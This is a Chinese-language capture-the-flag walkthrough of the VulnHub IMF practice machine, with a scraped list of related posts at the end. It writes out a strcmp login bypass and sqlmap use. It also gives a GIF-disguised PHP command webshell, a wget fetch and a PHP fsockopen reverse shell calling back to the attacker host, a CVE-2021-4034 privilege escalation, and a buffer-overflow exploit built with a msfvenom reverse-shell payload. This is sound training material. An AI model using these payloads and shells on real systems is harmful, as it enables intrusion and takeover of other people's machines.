8-vulnhub靶机-IMF-缓冲区提权
8-IMF
靶机地址:https://www.vulnhub.com/entry/imf-1,162/
靶机难度:中级(CTF)
1.信息收集
nmap
nmap 192.168.75.0/24 -sP
nmap 192.168.75.13 -sS -sV -A -T4
curl
curl http://192.168.75.13
ZmxhZzJ7YVcxbVl
XUnRhVzVwYzNS
eVlYUnZjZz09fQ==
ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==
也可以右键查看源代码
flag1{YWxsdGhlZmlsZXM=}
http://www.hiencode.com/base64.html
allthefiles
echo 'ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==' | base64 -d
flag2{aW1mYWRtaW5pc3RyYXRvcg==}
echo 'aW1mYWRtaW5pc3RyYXRvcg==' | base64 -d
imfadministrator
尝试访问 http://192.168.75.13/imfadministrator/
curl http://192.168.75.13/imfadministrator/
返回contact.php
http://192.168.75.13/contact.php
发现三个账户名
rmichaels
akeith
estone
尝试登录查看回显
rmichaels 是正确账户名
参考php strcmp比较字符串绕过:字符串和数组进行比较
http://www.atkx.top/2020/11/04/代码审计之弱类型绕过/字符串转换为数组:
我将字段名称更新pass为pass[],这意味着PHP将把这个字段解释为一个数组,而不是一个字符串。这有时会混淆验证字符串检查,如果输入是数组strcmp则会返回NULL!flag3{Y29udGludWVUT2Ntcw==}
continueTOcms
burp+sqlmap
点击IMF CMS
用burpsuite拦截流量包,右键点击:copy to file 保存到本地8-bp.txt文本中
cat 8-bp.txt
sqlmap -r 8-bp.txt --dump
database admin
table pages./images/whiteboard.jpg
./images/redacted.jpg
访问 http://192.168.75.13/imfadministrator/images/whiteboard.jpg
草科二维码解码 https://cli.im/deqr
flag4{dXBsb2Fkcjk0Mi5waHA=}
echo 'dXBsb2Fkcjk0Mi5waHA=' | base64 -d
uploadr942.php
访问http://192.168.75.13/imfadministrator/uploadr942.php
经过尝试允许上传jpg、png、gif
但是存在waf,利用双扩展名或空字符都无法绕过waf
2-webshell
gif ``绕过waf
参考文章 https://stackoverflow.com/questions/3597082/how-is-a-website-hacked-by-a-maliciously-encoded-image-that-contained-a-php-scr
通过插入GIF89a十六进制标头并附加,WAF没有发现为恶意的php代码来创建一个gif文件。
这里按照文章方法,然后双引号、单引号都无法利用绕过waf,这里参考文章:
https://blog.csdn.net/vspiders/article/details/70162604
反引号中,变量转义作为shell命令被执行!echo 'GIF89a <?php echo `id`; ?>' > shell.gif
上传 发现上传后的文件 被编码
回显:File successfully uploaded. 成功绕过waf!
访问 http://192.168.75.13/imfadministrator/uploads/e023b3beb50a.gif
由回显可知 常穿的shell 相当于在终端 id
https://zhuanlan.zhihu.com/p/25049406
知道JPG/JPEG文件会是FFD8FFE0为文件头!echo 'FFD8FFE1' | xxd -r -p > jpg.gif
echo '<?php $jpg=$_GET['jpg']; echo `$jpg`; ?>' > jpg.gif
xxd创建一个hexdump,使用组合-r和-p读取没有行号信息和特定列布局的普通十六进制转储。
这个也是可以的png目前不知道怎么绕过
php 一句话木马
上传一句话木马
echo 'GIF89a <?php $cmd=$_GET['cmd']; echo `$cmd`; ?>' > cmd.gif
http://192.168.75.13/imfadministrator/uploads/22143936f90b.gif?cmd=id
GET 传参 id 传给cmd 再执行
cmd=ls
flag5_abc123def.txtcmd=cat flag5_abc123def.txt
flag5{YWdlbnRzZXJ2aWNlcw==}echo 'YWdlbnRzZXJ2aWNlcw==' | base64 -d
agentservices
反弹shell
利用kali本地反弹shell
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
修改信息
本机开启httpserver
python -m SimpleHTTPServer 8081
cmd=wget http://192.168.75.5:8081/shell.php
cmd=ls
bash /临时切换shell 到bash
nc -lvp 6688
访问 http://192.168.75.13/imfadministrator/uploads/shell.php
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl+z
stty rawo -echo
fg
nc -lvp 6688
weevely 绕过waf
weevely generate passweevely weevely.php
cat weevely.php
mv weevely.php weevely.gif
vim weevely.gif 添加上 gif头部GIF98a
cat weevely.php
然后上传
weevely http://192.168.75.13/imfadministrator/uploads/cd73dccf5987.gif passweevely
why gif解析php
cd /var/www/html/imfadministrator/uploads ---进入文件上传目录
ls -la ---查看到存在.htaccess
cat查看信息:
AddType application/x-httpd-php .php .gif
AddHandler application/x-httpd-php .gif
可看到该文件与继续gif解析php文件!
3-提权
bashshell
nc -lvp 6688
php -r '$sock=fsockopen("192.168.75.5",6688);exec("/bin/sh -i <&3 >&3 2>&3");'python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo
fg
nc -lvp 6688
cve-2021-4034-poc.c
python -m SimpleHTTPServer 8081
wget http://192.168.75.5:8081/cve-2021-4034-poc.c
gcc cve-2021-4034-poc.c -o exp
chmod +x exp
./exp
cd /root
ls
cat Flag.txt
echo 'R2gwc3RQcm90MGMwbHM=' | base64 -d
Gh0stProt0c0ls
4-缓冲区溢出
agent
通过flag5 base64解码获得:agentservices
这是提示agent的服务存在问题!
find / -name agent 2>/dev/null
/usr/local/bin/agent
/etc/xinetd.d/agent查看文件信息
ls -al /usr/local/bin/agent
file /usr/local/bin/agent
可执行文件
ls -al /etc/xinetd.d/agent
file /etc/xinetd.d/agent
发现端口7788 root权限运行
netstat -ant
端口碰撞
cd /usr/local/bin/
ls
cat access_codes
knock 192.168.75.13 7482 8279 9467 -v
nmap 192.168.75.13 -p7788
nc 192.168.75.13 7788
base64下载
md5sum agent
fabc1afd43f668df0b812213567d032c
base64 agentvim base64.txt //将base64码复制进去
cat base64.txt | base64 -d > agent
chmod +x agent
md5sum agent
fabc1afd43f668df0b812213567d032c
ltrace追踪
ltrace ./agent
随意输入数字! //我这里输入的1
strncmp("dwqdq\n", "48093572", 8) = -1
//正在将我提供的字符串与字符串48093572进行比较,在这种情况下导致=-1)
strings分析
strings agent
两个地方使用了“%s”,这很可能是一个有效的溢出点!
Location: %s
Report: %s
gdb分析
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000
生成1200个字符
gdb ./agent
run
48093572 输入2000值后,发现segmentation fault溢出报错!存在缓冲区溢出!
0x41366641堆栈开始是EAX寄存器
EAX: 0xffffcfd4
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41366641
发现偏移量为:168
python -c 'print "A" * 168 + "B" * 4'
通过测试:
EAX: 0xffffcfd4 ('A' <repeats 152 times>, "\324\317\377\377", 'A' <repeats 15 times>, "BBBB")
EIP被168个字节覆盖,但是多给的B字节走到了EAX上,在给多个C测试shellcode会走哪儿!python -c 'print "A" * 168 + "B" * 4 + "CCCCCCCCCCCCCCCC"'
EAX: 0xffffcfd4 ('A' <repeats 152 times>, "\324\317\377\377", 'A' <repeats 12 times>, "BBBB", 'C' <repeats 16 times>)C也走到了EAX,找保护措施!那么只需要找到eax值,即可直接跳到shellcode!
checksec
CANARY : disabled
FORTIFY : disabled
NX : disabled
PIE : disabled
RELRO : PartialRELRO 是一种用于加强对 binary 数据段的保护的技术。
参考:https://lantern.cool/note-pwn-linux-protect/
ALSR
cat /proc/sys/kernel/randomize_va_space
2
或者:
sysctl -a --pattern randomize
kernel.randomize_va_space = 20 = 关闭
1 = 半随机。共享库、栈、mmap() 以及 VDSO 将被随机化。(留坑,PIE会影响heap的随机化。。)
2 = 全随机。除了1中所述,还有heap。
说明存在随机化!ASLR功能的程序使用ret2reg(返回寄存器)指令来利用缓冲区溢出参考大佬:
https://www.securitylab.ru/analytics/405868.php
JMP shellcode
gdb-peda$ jmpcall eax
0x8048563 : call eaxasmsearch "jmp eax"
asmsearch "call eax"EAX 地址0x8048563
目前知道了JMP值:0x8048563
偏移量:168接下来shellcode:避免使用空字符和换行符
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.75.5 LPORT=6666 -f python -b "\x00\x0a\x0b"payload:
-p 载荷类型
LHOST 本机地址
LPORT
-b 坏字符
-f 编译的语言
\x00 == 0x00 ASCII控制字符表中对应 NULL (空字符)
\x0a == 0X0a ASCII控制字符表中对应 LF (换行键)
\x0b == 0x0b ASCII控制字符表中对应 VT (垂直定位符号)
需要运行,在输入密码,在输入ID,才能进行缓冲区溢出,这时候需要expect的特殊脚本语言来写:
https://en.wikipedia.org/wiki/Expect
代码
client.recv(512) 中recv是recvsize的缩写,
参考:https://blog.csdn.net/momod/article/details/105883550
当使用socket模块,在接收请求数据时一般用s.recv()函数。
这个函数有一个bufsize参数,指定要接受的最大数据量。
一般教程会推荐设定这个值为1024。如这个简单的服务器代码:
python exp.py
//python exp2.py
5.资料
教学如果写py脚本对付缓冲区溢出
参考文章:
https://zhuanlan.zhihu.com/p/387321917
脚本:
https://github.com/hum4nG0D/OSCP_Bufferovrflw_Prep
https://github.com/corelan/mona缓冲区溢出非常好的文章:
https://secnigma.wordpress.com/2021/04/05/an-introduction-into-linux-buffer-overflow/
8-vulnhub靶机-IMF-缓冲区提权相关推荐
- [VulnHub靶机]Lin.Security_linux提权
文章目录 靶机描述 提权 1. sudo提权 2. socat提权 3. /etc/passwd哈希 3.1 /etc/passwd/ 3.2 /etc/shadow/ 4. crontab定时任务 ...
- Linux常用提权方法 (゚益゚メ) 渗透测试
文章目录 简介 常用命令汇总 靶机环境 Linux提权方法 Linux提权漏洞利用 脏牛(Dirty COW)CVE-2016-5195漏洞 CVE-2019-7304漏洞 CVE-2019-1327 ...
- 操作系统权限提升(三)之Windows系统内核溢出漏洞提权
系列文章 操作系统权限提升(一)之操作系统权限介绍 操作系统权限提升(二)之常见提权的环境介绍 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!! Windows系统内核溢出漏洞提权介绍 ...
- Linux提权之suid篇
Linux提权之suid篇 不知攻,焉知防 一个在安服路上摸索的大三生,记录平时学习笔记 suid前言: 1.只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义. ...
- 6-vulnhub靶场-LordOfTheRoot_1.0.1靶机内核提权udf提权缓冲区溢出提权
6-LordOfTheRoot_1.0.1 靶机地址 https://www.vulnhub.com/entry/lord-of-the-root-101,129/ 难度 中等(主要是缓冲区溢出) 1 ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权
VulnOSv2 write up 0x00 环境搭建 0x01 信息收集 0x02 漏洞挖掘 web思路 步骤一:枚举目录+主页挖掘 步骤二:OpenDocMan v1.2.7 cms利用 步骤三: ...
- Vulnhub 靶机 Stapler write up samba+wp advanced-video ->mysql 密码 连接 john解密 登录后台 wp插件getshell sudo提权
Stapler write up 0x00 靶机搭建 0x01 信息收集 0x02 漏洞挖掘 web思路 mysql 思路 ftp 思路 139 samba思路 步骤一:ftp匿名访问 步骤二:sam ...
- [VulnHub靶机]Lampiao_脏牛提权
文章目录 环境介绍 实验步骤 1. 扫描端口 2. 信息收集 3. ssh爆破 4. drupal 7 漏洞getshell 5. 脏牛提权 环境介绍 攻击机:kali(192.168.56.104) ...
最新文章
- vue+ivew-admin开发项目,内存占用过大解决办法
- 使用pytorch构建一个神经网络、损失函数、反向传播、更新网络参数
- (视频) 基于HTML5的服务器远程访问工具
- mysql安装图形化管理界面phpMyAdmin
- 数据库表扩展字段设计思路
- 信息学奥赛一本通(C++)在线评测系统——基础(一)C++语言—— 1056:点和正方形的关系
- 序列变换(Lis变形)
- 测试私有方法 重构_一个全栈工程师重构之路:中小公司 DevOps 落地实践
- python中使用cv2.findContours返回值too many values to unpack (expected 2)错误如何解决
- (网页)java数组去重总结(转)
- android 通过短信找回密码,我的android手机短信被我加密了,忘记密码了,在不刷机恢复出厂设置的情况下如何解决?急急急!!!!!...
- java replace 双引号到单引号
- 一台服务器装两个sql server_超详细的centos7部署zabbix监控服务器教程分享
- Linux内核快速处理路径尽量多用slab而慎用kmalloc
- Win 10 添加Epson网络打印机后刚开始可以打印,过一会就脱机
- 公司自动打卡与考勤作弊
- Unity颜色转换(HtmlString和Color)
- Android 与OpenCV454,实现模式匹配,色彩空间转换,QRcode识别
- 项目管理系统应该具有哪些功能
- MVC 自定义 错误页面